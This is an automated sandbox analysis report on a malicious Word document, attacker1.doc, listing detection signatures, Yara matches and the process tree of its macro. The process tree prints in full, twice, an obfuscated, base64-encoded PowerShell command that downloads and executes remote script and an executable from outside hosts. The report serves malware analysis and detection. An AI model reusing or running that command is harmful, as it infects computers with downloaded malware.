Loading ...

Play interactive tourEdit tour

Windows Analysis Report attacker1.doc

Overview

General Information

Sample Name:attacker1.doc
Analysis ID:520834
MD5:4443840f2870c2cd55062bdcab07e5fd
SHA1:61911e604362338b0f9c91c4aa69696a88dad62f
SHA256:2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Obfuscated command line found
Yara detected Obfuscated Powershell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1532 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 668 cmdline: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2984 cmdline: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
attacker1.docSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0xacd7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xacd7:$r2: P^O^W^E^R^S^H^E^L^L
attacker1.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0x11f8f:$s1: AutoOpen
  • 0x13c7c:$s1: AutoOpen
  • 0xf500:$s2: Macros
attacker1.docJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
    • 0xc1c8:$s1: \Common Files\Microsoft Shared\
    • 0x37b1:$s2: Scripting.FileSystemObject
    • 0x3cd8:$a3: AutoOpen
    • 0xc6b6:$a3: AutoOpen
    • 0xc91b:$a3: AutoOpen
    • 0xed63:$a3: AutoOpen

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x5b42:$r1: P^O^W^E^R^S^H^E^L^L
    • 0x5b42:$r2: P^O^W^E^R^S^H^E^L^L
    00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x1f9f:$r1: P^O^W^E^R^S^H^E^L^L
    • 0x1f9f:$r2: P^O^W^E^R^S^H^E^L^L
    00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmpJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
      00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x25de:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x4307:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x25de:$r2: P^O^W^E^R^S^H^E^L^L
      • 0x4307:$r2: P^O^W^E^R^S^H^E^L^L
      Process Memory Space: cmd.exe PID: 668SUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x2e8e:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xc56e:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xdd4b:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xe8c7:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xf325:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x2e8e:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xc56e:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xdd4b:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xe8c7:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xf325:$r2: P^O^W^E^R^S^H^E^L^L

      Sigma Overview

      System Summary:

      bar